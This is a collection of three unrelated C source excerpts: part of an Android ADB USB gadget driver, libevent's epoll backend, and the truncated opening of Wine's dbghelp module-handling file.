usb_ep_free_request(ep, req); } } static inline int adb_lock(atomic_t *excl) { if (atomic_inc_return(excl) == 1) { return 0; } else { atomic_dec(excl); return -1; } } static inline void adb_unlock(atomic_t *excl) { atomic_dec(excl); } /* add a request to the tail of a list */ void adb_req_put(struct adb_dev *dev, struct list_head *head, struct usb_request *req) { unsigned long flags; spin_lock_irqsave(&dev->lock, flags); list_add_tail(&req->list, head); spin_unlock_irqrestore(&dev->lock, flags); } /* remove a request from the head of a list */ struct usb_request *adb_req_get(struct adb_dev *dev, struct list_head *head) { unsigned long flags; struct usb_request *req; spin_lock_irqsave(&dev->lock, flags); if (list_empty(head)) { req = 0; } else { req = list_first_entry(head, struct usb_request, list); list_del(&req->list); } spin_unlock_irqrestore(&dev->lock, flags); return req; } static void adb_complete_in(struct usb_ep *ep, struct usb_request *req) { struct adb_dev *dev = _adb_dev; if (req->status != 0) dev->error = 1; adb_req_put(dev, &dev->tx_idle, req); wake_up(&dev->write_wq); } static void adb_complete_out(struct usb_ep *ep, struct usb_request *req) { struct adb_dev *dev = _adb_dev; dev->rx_done = 1; if (req->status != 0 && req->status != -ECONNRESET) dev->error = 1; wake_up(&dev->read_wq); } static int adb_create_bulk_endpoints(struct adb_dev *dev, struct usb_endpoint_descriptor *in_desc, struct usb_endpoint_descriptor *out_desc) { struct usb_composite_dev *cdev = dev->cdev; struct usb_request *req; struct usb_ep *ep; int i; DBG(cdev, "create_bulk_endpoints dev: %p\n", dev); ep = usb_ep_autoconfig(cdev->gadget, in_desc); if (!ep) { DBG(cdev, "usb_ep_autoconfig for ep_in failed\n"); return -ENODEV; } DBG(cdev, "usb_ep_autoconfig for ep_in got %s\n", ep->name); ep->driver_data = dev; /* claim the endpoint */ dev->ep_in = ep; ep = usb_ep_autoconfig(cdev->gadget, out_desc); if (!ep) { DBG(cdev, "usb_ep_autoconfig for ep_out failed\n"); return -ENODEV; } DBG(cdev, "usb_ep_autoconfig for adb ep_out got %s\n", ep->name); ep->driver_data = dev; /* claim the endpoint */ dev->ep_out = ep; /* now allocate requests for our endpoints */ req = adb_request_new(dev->ep_out, ADB_BULK_BUFFER_SIZE); if (!req) goto fail; req->complete = adb_complete_out; dev->rx_req = req; for (i = 0; i < TX_REQ_MAX; i++) { req = adb_request_new(dev->ep_in, ADB_BULK_BUFFER_SIZE); if (!req) goto fail; req->complete = adb_complete_in; adb_req_put(dev, &dev->tx_idle, req); } return 0; fail: printk(KERN_ERR "adb_bind() could not allocate requests\n"); return -1; } static ssize_t adb_read(struct file *fp, char __user *buf, size_t count, loff_t *pos) { struct adb_dev *dev = fp->private_data; struct usb_request *req; int r = count, xfer; int ret; pr_debug("adb_read(%zu)\n", count); if (!_adb_dev) return -ENODEV; if (count > ADB_BULK_BUFFER_SIZE) return -EINVAL; if (adb_lock(&dev->read_excl)) return -EBUSY; /* we will block until we're online */ while (!(dev->online || dev->error)) { pr_debug("adb_read: waiting for online state\n"); ret = wait_event_interruptible(dev->read_wq, (dev->online || dev->error)); if (ret < 0) { adb_unlock(&dev->read_excl); return ret; } } if (dev->error) { r = -EIO; goto done; } requeue_req: /* queue a request */ req = dev->rx_req; #ifndef CONFIG_ARCH_SUN9I req->length = count; #else req->length = count + dev->ep_out->maxpacket - 1; req->length -= req->length % dev->ep_out->maxpacket; #endif dev->rx_done = 0; ret = usb_ep_queue(dev->ep_out, req, GFP_ATOMIC); if (ret < 0) { pr_debug("adb_read: failed to queue req %p (%d)\n", req, ret); r = -EIO; dev->error = 1; goto done; } else { pr_debug("rx %p queue\n", req); } /* wait for a request to complete */ ret = wait_event_interruptible(dev->read_wq, dev->rx_done); if (ret < 0) { if (ret != -ERESTARTSYS) dev->error = 1; r = ret; usb_ep_dequeue(dev->ep_out, req); goto done; } if (!dev->error) { /* If we got a 0-len packet, throw it back and try again. */ if (req->actual == 0) goto requeue_req; pr_debug("rx %p %d\n", req, req->actual); xfer = (req->actual < count) ? req->actual : count; if (copy_to_user(buf, req->buf, xfer)) r = -EFAULT; } else r = -EIO; done: adb_unlock(&dev->read_excl); pr_debug("adb_read returning %d\n", r); return r; } static ssize_t adb_write(struct file *fp, const char __user *buf, size_t count, loff_t *pos) { struct adb_dev *dev = fp->private_data; struct usb_request *req = 0; int r = count, xfer; int ret; if (!_adb_dev) return -ENODEV; pr_debug("adb_write(%zu)\n", count); if (adb_lock(&dev->write_excl)) return -EBUSY; while (count > 0) { if (dev->error) { pr_debug("adb_write dev->error\n"); r = -EIO; break; } /* get an idle tx request to use */ req = 0; ret = wait_event_interruptible(dev->write_wq, (req = adb_req_get(dev, &dev->tx_idle)) || dev->error); if (ret < 0) { r = ret; break; } if (req != 0) { if (count > ADB_BULK_BUFFER_SIZE) xfer = ADB_BULK_BUFFER_SIZE; else xfer = count; if (copy_from_user(req->buf, buf, xfer)) { r = -EFAULT; break; } req->length = xfer; ret = usb_ep_queue(dev->ep_in, req, GFP_ATOMIC); if (ret < 0) { pr_debug("adb_write: xfer error %d\n", ret); dev->error = 1; r = -EIO; break; } buf += xfer; count -= xfer; /* zero this so we don't try to free it on error exit */ req = 0; } } if (req) adb_req_put(dev, &dev->tx_idle, req); adb_unlock(&dev->write_excl); pr_debug("adb_write returning %d\n", r); return r; } static int adb_open(struct inode *ip, struct file *fp) { pr_info("adb_open\n"); if (!_adb_dev) return -ENODEV; if (adb_lock(&_adb_dev->open_excl)) return -EBUSY; fp->private_data = _adb_dev; /* clear the error latch */ _adb_dev->error = 0; adb_ready_callback(); return 0; } static int adb_release(struct inode *ip, struct file *fp) { pr_info("adb_release\n"); adb_closed_callback(); adb_unlock(&_adb_dev->open_excl); return 0; } /* file operations for ADB device /dev/android_adb */ static const struct file_operations adb_fops = { .owner = THIS_MODULE, .read = adb_read, .write = adb_write, .open = adb_open, .release = adb_release, }; static struct miscdevice adb_device = { .minor = MISC_DYNAMIC_MINOR, .name = adb_shortname, .fops = &adb_fops, }; static int adb_function_bind(struct usb_configuration *c, struct usb_function *f) { struct usb_composite_dev *cdev = c->cdev; struct adb_dev *dev = func_to_adb(f); int id; int ret; dev->cdev = cdev; DBG(cdev, "adb_function_bind dev: %p\n", dev); /* allocate interface ID(s) */ id = usb_interface_id(c, f); if (id < 0) return id; adb_interface_desc.bInterfaceNumber = id; /* allocate endpoints */ ret = adb_create_bulk_endpoints(dev, &adb_fullspeed_in_desc, &adb_fullspeed_out_desc); if (ret) return ret; /* support high speed hardware */ if (gadget_is_dualspeed(c->cdev->gadget)) { adb_highspeed_in_desc.bEndpointAddress = adb_fullspeed_in_desc.bEndpointAddress; adb_highspeed_out_desc.bEndpointAddress = adb_fullspeed_out_desc.bEndpointAddress; } /* support super speed hardware */ if (gadget_is_superspeed(c->cdev->gadget)) { adb_superspeed_in_desc.bEndpointAddress = adb_fullspeed_in_desc.bEndpointAddress; adb_superspeed_out_desc.bEndpointAddress = adb_fullspeed_out_desc.bEndpointAddress; } DBG(cdev, "%s speed %s: IN/%s, OUT/%s\n", gadget_is_dualspeed(c->cdev->gadget) ? "dual" : "full", f->name, dev->ep_in->name, dev->ep_out->name); return 0; } static void adb_function_unbind(struct usb_configuration *c, struct usb_function *f) { struct adb_dev *dev = func_to_adb(f); struct usb_request *req; dev->online = 0; dev->error = 1; wake_up(&dev->read_wq); adb_request_free(dev->rx_req, dev->ep_out); while ((req = adb_req_get(dev, &dev->tx_idle))) adb_request_free(req, dev->ep_in); } static int adb_function_set_alt(struct usb_function *f, unsigned intf, unsigned alt) { struct adb_dev *dev = func_to_adb(f); struct usb_composite_dev *cdev = f->config->cdev; int ret; DBG(cdev, "adb_function_set_alt intf: %d alt: %d\n", intf, alt); ret = config_ep_by_speed(cdev->gadget, f, dev->ep_in); if (ret) return ret; ret = usb_ep_enable(dev->ep_in); if (ret) return ret; ret = config_ep_by_speed(cdev->gadget, f, dev->ep_out); if (ret) return ret; ret = usb_ep_enable(dev->ep_out); if (ret) { usb_ep_disable(dev->ep_in); return ret; } dev->online = 1; /* readers may be blocked waiting for us to go online */ wake_up(&dev->read_wq); return 0; } static void adb_function_disable(struct usb_function *f) { struct adb_dev *dev = func_to_adb(f); struct usb_composite_dev *cdev = dev->cdev; DBG(cdev, "adb_function_disable cdev %p\n", cdev); dev->online = 0; dev->error = 1; usb_ep_disable(dev->ep_in); usb_ep_disable(dev->ep_out); /* readers may be blocked waiting for us to go online */ wake_up(&dev->read_wq); VDBG(cdev, "%s disabled\n", dev->function.name); } static int adb_bind_config(struct usb_configuration *c) { struct adb_dev *dev = _adb_dev; printk(KERN_INFO "adb_bind_config\n"); dev->cdev = c->cdev; dev->function.name = "adb"; dev->function.fs_descriptors = fs_adb_descs; dev->function.hs_descriptors = hs_adb_descs; dev->function.ss_descriptors = ss_adb_descs; dev->function.bind = adb_function_bind; dev->function.unbind = adb_function_unbind; dev->function.set_alt = adb_function_set_alt; dev->function.disable = adb_function_disable; return usb_add_function(c, &dev->function); } static int adb_setup(void) { struct adb_dev *dev; int ret; dev = kzalloc(sizeof(*dev), GFP_KERNEL); if (!dev) return -ENOMEM; spin_lock_init(&dev->lock); init_waitqueue_head(&dev->read_wq); init_waitqueue_head(&dev->write_wq); atomic_set(&dev->open_excl, 0); atomic_set(&dev->read_excl, 0); atomic_set(&dev->write_excl, 0); INIT_LIST_HEAD(&dev->tx_idle); _adb_dev = dev; ret = misc_register(&adb_device); if (ret) goto err; return 0; err: kfree(dev); printk(KERN_ERR "adb gadget driver failed to initialize\n"); return ret; } static void adb_cleanup(void) { misc_deregister(&adb_device); kfree(_adb_dev); _adb_dev = NULL; }
{ "language": "C" }
/* * Copyright 2000-2007 Niels Provos <provos@citi.umich.edu> * Copyright 2007-2012 Niels Provos, Nick Mathewson * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include "event2/event-config.h" #include "evconfig-private.h" #ifdef EVENT__HAVE_EPOLL #include <stdint.h> #include <sys/types.h> #include <sys/resource.h> #ifdef EVENT__HAVE_SYS_TIME_H #include <sys/time.h> #endif #include <sys/queue.h> #include <sys/epoll.h> #include <signal.h> #include <limits.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #ifdef EVENT__HAVE_FCNTL_H #include <fcntl.h> #endif #ifdef EVENT__HAVE_SYS_TIMERFD_H #include <sys/timerfd.h> #endif #include "event-internal.h" #include "evsignal-internal.h" #include "event2/thread.h" #include "evthread-internal.h" #include "log-internal.h" #include "evmap-internal.h" #include "changelist-internal.h" #include "time-internal.h" /* Since Linux 2.6.17, epoll is able to report about peer half-closed connection using special EPOLLRDHUP flag on a read event. */ #if !defined(EPOLLRDHUP) #define EPOLLRDHUP 0 #define EARLY_CLOSE_IF_HAVE_RDHUP 0 #else #define EARLY_CLOSE_IF_HAVE_RDHUP EV_FEATURE_EARLY_CLOSE #endif #include "epolltable-internal.h" #if defined(EVENT__HAVE_SYS_TIMERFD_H) && \ defined(EVENT__HAVE_TIMERFD_CREATE) && \ defined(HAVE_POSIX_MONOTONIC) && defined(TFD_NONBLOCK) && \ defined(TFD_CLOEXEC) /* Note that we only use timerfd if TFD_NONBLOCK and TFD_CLOEXEC are available and working. This means that we can't support it on 2.6.25 (where timerfd was introduced) or 2.6.26, since 2.6.27 introduced those flags. */ #define USING_TIMERFD #endif struct epollop { struct epoll_event *events; int nevents; int epfd; #ifdef USING_TIMERFD int timerfd; #endif }; static void *epoll_init(struct event_base *); static int epoll_dispatch(struct event_base *, struct timeval *); static void epoll_dealloc(struct event_base *); static const struct eventop epollops_changelist = { "epoll (with changelist)", epoll_init, event_changelist_add_, event_changelist_del_, epoll_dispatch, epoll_dealloc, 1, /* need reinit */ EV_FEATURE_ET|EV_FEATURE_O1| EARLY_CLOSE_IF_HAVE_RDHUP, EVENT_CHANGELIST_FDINFO_SIZE }; static int epoll_nochangelist_add(struct event_base *base, evutil_socket_t fd, short old, short events, void *p); static int epoll_nochangelist_del(struct event_base *base, evutil_socket_t fd, short old, short events, void *p); const struct eventop epollops = { "epoll", epoll_init, epoll_nochangelist_add, epoll_nochangelist_del, epoll_dispatch, epoll_dealloc, 1, /* need reinit */ EV_FEATURE_ET|EV_FEATURE_O1|EV_FEATURE_EARLY_CLOSE, 0 }; #define INITIAL_NEVENT 32 #define MAX_NEVENT 4096 /* On Linux kernels at least up to 2.6.24.4, epoll can't handle timeout * values bigger than (LONG_MAX - 999ULL)/HZ. HZ in the wild can be * as big as 1000, and LONG_MAX can be as small as (1<<31)-1, so the * largest number of msec we can support here is 2147482. Let's * round that down by 47 seconds. */ #define MAX_EPOLL_TIMEOUT_MSEC (35*60*1000) static void * epoll_init(struct event_base *base) { int epfd = -1; struct epollop *epollop; #ifdef EVENT__HAVE_EPOLL_CREATE1 /* First, try the shiny new epoll_create1 interface, if we have it. */ epfd = epoll_create1(EPOLL_CLOEXEC); #endif if (epfd == -1) { /* Initialize the kernel queue using the old interface. (The size field is ignored since 2.6.8.) */ if ((epfd = epoll_create(32000)) == -1) { if (errno != ENOSYS) event_warn("epoll_create"); return (NULL); } evutil_make_socket_closeonexec(epfd); } if (!(epollop = mm_calloc(1, sizeof(struct epollop)))) { close(epfd); return (NULL); } epollop->epfd = epfd; /* Initialize fields */ epollop->events = mm_calloc(INITIAL_NEVENT, sizeof(struct epoll_event)); if (epollop->events == NULL) { mm_free(epollop); close(epfd); return (NULL); } epollop->nevents = INITIAL_NEVENT; if ((base->flags & EVENT_BASE_FLAG_EPOLL_USE_CHANGELIST) != 0 || ((base->flags & EVENT_BASE_FLAG_IGNORE_ENV) == 0 && evutil_getenv_("EVENT_EPOLL_USE_CHANGELIST") != NULL)) { base->evsel = &epollops_changelist; } #ifdef USING_TIMERFD /* The epoll interface ordinarily gives us one-millisecond precision, so on Linux it makes perfect sense to use the CLOCK_MONOTONIC_COARSE timer. But when the user has set the new PRECISE_TIMER flag for an event_base, we can try to use timerfd to give them finer granularity. */ if ((base->flags & EVENT_BASE_FLAG_PRECISE_TIMER) && base->monotonic_timer.monotonic_clock == CLOCK_MONOTONIC) { int fd; fd = epollop->timerfd = timerfd_create(CLOCK_MONOTONIC, TFD_NONBLOCK|TFD_CLOEXEC); if (epollop->timerfd >= 0) { struct epoll_event epev; memset(&epev, 0, sizeof(epev)); epev.data.fd = epollop->timerfd; epev.events = EPOLLIN; if (epoll_ctl(epollop->epfd, EPOLL_CTL_ADD, fd, &epev) < 0) { event_warn("epoll_ctl(timerfd)"); close(fd); epollop->timerfd = -1; } } else { if (errno != EINVAL && errno != ENOSYS) { /* These errors probably mean that we were * compiled with timerfd/TFD_* support, but * we're running on a kernel that lacks those. */ event_warn("timerfd_create"); } epollop->timerfd = -1; } } else { epollop->timerfd = -1; } #endif evsig_init_(base); return (epollop); } static const char * change_to_string(int change) { change &= (EV_CHANGE_ADD|EV_CHANGE_DEL); if (change == EV_CHANGE_ADD) { return "add"; } else if (change == EV_CHANGE_DEL) { return "del"; } else if (change == 0) { return "none"; } else { return "???"; } } static const char * epoll_op_to_string(int op) { return op == EPOLL_CTL_ADD?"ADD": op == EPOLL_CTL_DEL?"DEL": op == EPOLL_CTL_MOD?"MOD": "???"; } #define PRINT_CHANGES(op, events, ch, status) \ "Epoll %s(%d) on fd %d " status ". " \ "Old events were %d; " \ "read change was %d (%s); " \ "write change was %d (%s); " \ "close change was %d (%s)", \ epoll_op_to_string(op), \ events, \ ch->fd, \ ch->old_events, \ ch->read_change, \ change_to_string(ch->read_change), \ ch->write_change, \ change_to_string(ch->write_change), \ ch->close_change, \ change_to_string(ch->close_change) static int epoll_apply_one_change(struct event_base *base, struct epollop *epollop, const struct event_change *ch) { struct epoll_event epev; int op, events = 0; int idx; idx = EPOLL_OP_TABLE_INDEX(ch); op = epoll_op_table[idx].op; events = epoll_op_table[idx].events; if (!events) { EVUTIL_ASSERT(op == 0); return 0; } if ((ch->read_change|ch->write_change) & EV_CHANGE_ET) events |= EPOLLET; memset(&epev, 0, sizeof(epev)); epev.data.fd = ch->fd; epev.events = events; if (epoll_ctl(epollop->epfd, op, ch->fd, &epev) == 0) { event_debug((PRINT_CHANGES(op, epev.events, ch, "okay"))); return 0; } switch (op) { case EPOLL_CTL_MOD: if (errno == ENOENT) { /* If a MOD operation fails with ENOENT, the * fd was probably closed and re-opened. We * should retry the operation as an ADD. */ if (epoll_ctl(epollop->epfd, EPOLL_CTL_ADD, ch->fd, &epev) == -1) { event_warn("Epoll MOD(%d) on %d retried as ADD; that failed too", (int)epev.events, ch->fd); return -1; } else { event_debug(("Epoll MOD(%d) on %d retried as ADD; succeeded.", (int)epev.events, ch->fd)); return 0; } } break; case EPOLL_CTL_ADD: if (errno == EEXIST) { /* If an ADD operation fails with EEXIST, * either the operation was redundant (as with a * precautionary add), or we ran into a fun * kernel bug where using dup*() to duplicate the * same file into the same fd gives you the same epitem * rather than a fresh one. For the second case, * we must retry with MOD. */ if (epoll_ctl(epollop->epfd, EPOLL_CTL_MOD, ch->fd, &epev) == -1) { event_warn("Epoll ADD(%d) on %d retried as MOD; that failed too", (int)epev.events, ch->fd); return -1; } else { event_debug(("Epoll ADD(%d) on %d retried as MOD; succeeded.", (int)epev.events, ch->fd)); return 0; } } break; case EPOLL_CTL_DEL: if (errno == ENOENT || errno == EBADF || errno == EPERM) { /* If a delete fails with one of these errors, * that's fine too: we closed the fd before we * got around to calling epoll_dispatch. */ event_debug(("Epoll DEL(%d) on fd %d gave %s: DEL was unnecessary.", (int)epev.events, ch->fd, strerror(errno))); return 0; } break; default: break; } event_warn(PRINT_CHANGES(op, epev.events, ch, "failed")); return -1; } static int epoll_apply_changes(struct event_base *base) { struct event_changelist *changelist = &base->changelist; struct epollop *epollop = base->evbase; struct event_change *ch; int r = 0; int i; for (i = 0; i < changelist->n_changes; ++i) { ch = &changelist->changes[i]; if (epoll_apply_one_change(base, epollop, ch) < 0) r = -1; } return (r); } static int epoll_nochangelist_add(struct event_base *base, evutil_socket_t fd, short old, short events, void *p) { struct event_change ch; ch.fd = fd; ch.old_events = old; ch.read_change = ch.write_change = ch.close_change = 0; if (events & EV_WRITE) ch.write_change = EV_CHANGE_ADD | (events & EV_ET); if (events & EV_READ) ch.read_change = EV_CHANGE_ADD | (events & EV_ET); if (events & EV_CLOSED) ch.close_change = EV_CHANGE_ADD | (events & EV_ET); return epoll_apply_one_change(base, base->evbase, &ch); } static int epoll_nochangelist_del(struct event_base *base, evutil_socket_t fd, short old, short events, void *p) { struct event_change ch; ch.fd = fd; ch.old_events = old; ch.read_change = ch.write_change = ch.close_change = 0; if (events & EV_WRITE) ch.write_change = EV_CHANGE_DEL | (events & EV_ET); if (events & EV_READ) ch.read_change = EV_CHANGE_DEL | (events & EV_ET); if (events & EV_CLOSED) ch.close_change = EV_CHANGE_DEL | (events & EV_ET); return epoll_apply_one_change(base, base->evbase, &ch); } static int epoll_dispatch(struct event_base *base, struct timeval *tv) { struct epollop *epollop = base->evbase; struct epoll_event *events = epollop->events; int i, res; long timeout = -1; #ifdef USING_TIMERFD if (epollop->timerfd >= 0) { struct itimerspec is; is.it_interval.tv_sec = 0; is.it_interval.tv_nsec = 0; if (tv == NULL) { /* No timeout; disarm the timer. */ is.it_value.tv_sec = 0; is.it_value.tv_nsec = 0; } else { if (tv->tv_sec == 0 && tv->tv_usec == 0) { /* we need to exit immediately; timerfd can't * do that. */ timeout = 0; } is.it_value.tv_sec = tv->tv_sec; is.it_value.tv_nsec = tv->tv_usec * 1000; } /* TODO: we could avoid unnecessary syscalls here by only calling timerfd_settime when the top timeout changes, or when we're called with a different timeval. */ if (timerfd_settime(epollop->timerfd, 0, &is, NULL) < 0) { event_warn("timerfd_settime"); } } else #endif if (tv != NULL) { timeout = evutil_tv_to_msec_(tv); if (timeout < 0 || timeout > MAX_EPOLL_TIMEOUT_MSEC) { /* Linux kernels can wait forever if the timeout is * too big; see comment on MAX_EPOLL_TIMEOUT_MSEC. */ timeout = MAX_EPOLL_TIMEOUT_MSEC; } } epoll_apply_changes(base); event_changelist_remove_all_(&base->changelist, base); EVBASE_RELEASE_LOCK(base, th_base_lock); res = epoll_wait(epollop->epfd, events, epollop->nevents, timeout); EVBASE_ACQUIRE_LOCK(base, th_base_lock); if (res == -1) { if (errno != EINTR) { event_warn("epoll_wait"); return (-1); } return (0); } event_debug(("%s: epoll_wait reports %d", __func__, res)); EVUTIL_ASSERT(res <= epollop->nevents); for (i = 0; i < res; i++) { int what = events[i].events; short ev = 0; #ifdef USING_TIMERFD if (events[i].data.fd == epollop->timerfd) continue; #endif if (what & (EPOLLHUP|EPOLLERR)) { ev = EV_READ | EV_WRITE; } else { if (what & EPOLLIN) ev |= EV_READ; if (what & EPOLLOUT) ev |= EV_WRITE; if (what & EPOLLRDHUP) ev |= EV_CLOSED; } if (!ev) continue; evmap_io_active_(base, events[i].data.fd, ev | EV_ET); } if (res == epollop->nevents && epollop->nevents < MAX_NEVENT) { /* We used all of the event space this time. We should be ready for more events next time. */ int new_nevents = epollop->nevents * 2; struct epoll_event *new_events; new_events = mm_realloc(epollop->events, new_nevents * sizeof(struct epoll_event)); if (new_events) { epollop->events = new_events; epollop->nevents = new_nevents; } } return (0); } static void epoll_dealloc(struct event_base *base) { struct epollop *epollop = base->evbase; evsig_dealloc_(base); if (epollop->events) mm_free(epollop->events); if (epollop->epfd >= 0) close(epollop->epfd); #ifdef USING_TIMERFD if (epollop->timerfd >= 0) close(epollop->timerfd); #endif memset(epollop, 0, sizeof(struct epollop)); mm_free(epollop); } #endif /* EVENT__HAVE_EPOLL */
{ "language": "C" }
/* * File module.c - module handling for the wine debugger * * Copyright (C) 1993, Eric Youngdale. * 2000-2007, Eric Pouech * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA */ #include "config.h" #include <stdlib.h> #include <stdio.h> #include <string.h> #include <assert.h> #include "dbghelp_private.h" #include "psapi.h" #include "winternl.h" #include "wine/debug.h" #include "wine/heap.h" WINE_DEFAULT_DEBUG_CHANNEL(dbghelp); const WCHAR S_ElfW[] = {'<','e','l','f','>','\0'}; const WCHAR S_WineLoaderW[] = {'<','w','i','n','e','-','l','o','a','d','e','r','>','\0'}; static const WCHAR S_DotSoW[] = {'.','s','o','\0'}; static const WCHAR S_DotDylibW[] = {'.','d','y','l','i','b','\0'}; static const WCHAR S_DotPdbW[] = {'.','p','d','b','\0'}; static const WCHAR S_DotDbgW[] = {'.','d','b','g','\0'}; const WCHAR S_SlashW[] = {'/','\0'}; static const WCHAR S_AcmW[] = {'.','a','c','m','\0'}; static const WCHAR S_DllW[] = {'.','d','l','l','\0'}; static const WCHAR S_DrvW[] = {'.','d','r','v','\0'}; static const WCHAR S_ExeW[] = {'.','e','x','e','\0'}; static const WCHAR S_OcxW[] = {'.','o','c','x','\0'}; static const WCHAR S_VxdW[] = {'.','v','x','d','\0'}; static const WCHAR * const ext[] = {S_AcmW, S_DllW, S_DrvW, S_ExeW, S_OcxW, S_VxdW, NULL}; static int match_ext(const WCHAR* ptr, size_t len) { const WCHAR* const *e; size_t l; for (e = ext; *e; e++) { l = strlenW(*e); if (l >= len) return 0; if (strncmpiW(&ptr[len - l], *e, l)) continue; return l; } return 0; } static const WCHAR* get_filename(const WCHAR* name, const WCHAR* endptr) { const WCHAR* ptr; if (!endptr) endptr = name + strlenW(name); for (ptr = endptr - 1; ptr >= name; ptr--) { if (*ptr == '/' || *ptr == '\\') break; } return ++ptr; } static BOOL is_wine_loader(const WCHAR *module) { static const WCHAR wineW[] = {'w','i','n','e',0}; static const WCHAR suffixW[] = {'6','4',0}; const WCHAR *filename = get_filename(module, NULL); const char *ptr, *p; BOOL ret = FALSE; WCHAR *buffer; DWORD len; if ((ptr = getenv("WINELOADER"))) { if ((p = strrchr(ptr, '/'))) ptr = p + 1; len = 2 + MultiByteToWideChar( CP_UNIXCP, 0, ptr, -1, NULL, 0 ); buffer = heap_alloc( len * sizeof(WCHAR) ); MultiByteToWideChar( CP_UNIXCP, 0, ptr, -1, buffer, len ); } else { buffer = heap_alloc( sizeof(wineW) + 2 * sizeof(WCHAR) ); strcpyW( buffer, wineW ); } if (!strcmpW( filename, buffer )) ret = TRUE; strcatW( buffer, suffixW ); if (!strcmpW( filename, buffer )) ret = TRUE; heap_free( buffer ); return ret; } static void module_fill_module(const WCHAR* in, WCHAR* out, size_t size) { const WCHAR *ptr, *endptr; size_t len, l; ptr = get_filename(in, endptr = in + strlenW(in)); len = min(endptr - ptr, size - 1); memcpy(out, ptr, len * sizeof(WCHAR)); out[len] = '\0'; if (len > 4 && (l = match_ext(out, len))) out[len - l] = '\0'; else if (is_wine_loader(out)) lstrcpynW(out, S_WineLoaderW, size); else { if (len > 3 && !strcmpiW(&out[len - 3], S_DotSoW) && (l = match_ext(out, len - 3))) strcpyW(&out[len - l - 3], S_ElfW); } while ((*out = tolowerW(*out))) out++; } void module_set_module(struct module* module, const WCHAR* name) { module_fill_module(name, module->module.ModuleName, ARRAY_SIZE(module->module.ModuleName)); module_fill_module(name, module->modulename, ARRAY_SIZE(module->modulename)); } /* Returned string must be freed by caller */ WCHAR *get_wine_loader_name(struct process *pcs) { static const WCHAR wineW[] = {'w','i','n','e',0}; static const WCHAR suffixW[] = {'6','4',0}; WCHAR *buffer, *p; const char *env; /* All binaries are loaded with WINELOADER (if run from tree) or by the * main executable */ if ((env = getenv("WINELOADER"))) { DWORD len = 2 + MultiByteToWideChar( CP_UNIXCP, 0, env, -1, NULL, 0 ); buffer = heap_alloc( len * sizeof(WCHAR) ); MultiByteToWideChar( CP_UNIXCP, 0, env, -1, buffer, len ); } else { buffer = heap_alloc( sizeof(wineW) + 2 * sizeof(WCHAR) ); strcpyW( buffer, wineW ); } p = buffer + strlenW( buffer ) - strlenW( suffixW ); if (p > buffer && !strcmpW( p, suffixW )) *p = 0; if (pcs->is_64bit) strcatW(buffer, suffixW); TRACE( "returning %s\n", debugstr_w(buffer) ); return buffer; } static const char* get_module_type(enum module_type type, BOOL virtual) { switch (type) { case DMT_ELF: return virtual ? "Virtual ELF" : "ELF"; case DMT_PE: return virtual ? "Virtual PE" : "PE"; case DMT_MACHO: return virtual ? "Virtual Mach-O" : "Mach-O"; default: return "---"; } } /*********************************************************************** * Creates and links a new module to a process */ struct module* module_new(struct process* pcs, const WCHAR* name, enum module_type type, BOOL virtual, DWORD64 mod_addr, DWORD64 size, unsigned long stamp, unsigned long checksum) { struct module* module; unsigned i; assert(type == DMT_ELF || type == DMT_PE || type == DMT_MACHO); if (!(module = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(*module)))) return NULL; module->next = pcs->lmodules; pcs->lmodules = module; TRACE("=> %s %s-%s %s\n", get_module_type(type, virtual), wine_dbgstr_longlong(mod_addr), wine_dbgstr_longlong(mod_addr + size), debugstr_w(name)); pool_init(&module->pool, 65536); module->process = pcs; module->module.SizeOfStruct = sizeof(module->module); module->module.BaseOfImage = mod_addr; module->module.ImageSize = size; module_set_module(module, name); module->module.ImageName[0] = '\0'; lstrcpynW(module->module.LoadedImageName, name, ARRAY_SIZE(module->module.LoadedImageName)); module->module.SymType = SymNone; module->module.NumSyms = 0; module->module.TimeDateStamp = stamp; module->module.CheckSum = checksum; memset(module->module.LoadedPdbName, 0, sizeof(module->module.LoadedPdbName)); module->module.CVSig = 0; memset(module->module.CVData, 0, sizeof(module->module.CVData)); module->module.PdbSig = 0; memset(&module->module.PdbSig70, 0, sizeof(module->module.PdbSig70)); module->module.PdbAge = 0; module->module.PdbUnmatched = FALSE; module->module.DbgUnmatched = FALSE; module->module.LineNumbers = FALSE; module->module.GlobalSymbols = FALSE; module->module.TypeInfo = FALSE; module->module.SourceIndexed = FALSE; module->module.Publics = FALSE; module->reloc_delta = 0; module->type = type; module->is_virtual = virtual; for (i = 0; i < DFI_LAST; i++) module->format_info[i] = NULL; module->sortlist_valid = FALSE; module->sorttab_size = 0; module->addr_sorttab = NULL; module->num_sorttab = 0; module->num_symbols = 0; vector_init(&module->vsymt, sizeof(struct symt*), 128); /* FIXME: this seems a bit too high (on a per 